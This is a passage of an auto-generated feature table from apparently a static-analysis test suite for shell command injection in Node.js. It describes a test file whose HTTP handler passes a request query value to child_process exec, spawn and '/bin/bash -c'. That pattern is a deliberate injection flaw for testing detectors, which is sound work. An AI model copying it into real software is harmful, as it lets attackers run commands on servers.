autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:15:43:17 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:15 | cp.execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:15 | cp.execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:15 | cp.execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:15 | cp.execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:15 | cp.execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | cp.exec ... , args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | cp.exec ... , args) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | cp.exec ... , args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | cp.exec ... , args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | cp.exec ... , args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | exceptional return of cp.exec ... , args) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | exceptional return of cp.exec ... , args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | exceptional return of cp.exec ... , args) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | exceptional return of cp.exec ... , args) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:5:44:34 | exceptional return of cp.exec ... , args) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:8:44:15 | execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:8:44:15 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:8:44:15 | execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:8:44:15 | execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:8:44:15 | execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:17:44:27 | "/bin/bash" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:44:30:44:33 | args | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:12 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:12 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:12 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:12 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:12 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args = [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args = [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args = [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args = [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:9:46:17 | args = [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:16:46:17 | [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:16:46:17 | [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:16:46:17 | [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:16:46:17 | [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:46:16:46:17 | [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:8 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:8 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:8 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:8 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:8 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:11 | args[0] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:11 | args[0] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:11 | args[0] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:11 | args[0] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:11 | args[0] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:18 | args[0] = "-c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:18 | args[0] = "-c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:18 | args[0] = "-c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:18 | args[0] = "-c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:5:47:18 | args[0] = "-c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:10:47:10 | 0 | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:10:47:10 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:10:47:10 | 0 | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:10:47:10 | 0 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:10:47:10 | 0 | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:15:47:18 | "-c" | assignedToPropName | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:15:47:18 | "-c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:15:47:18 | "-c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:15:47:18 | "-c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:15:47:18 | "-c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:47:15:47:18 | "-c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:8 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:8 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:8 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:8 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:8 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:11 | args[1] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:11 | args[1] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:11 | args[1] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:11 | args[1] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:11 | args[1] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:17 | args[1] = cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:48:5:48:17 | args[1] = cmd | contextSurroundingFunctionParameters | (req, res) | +| 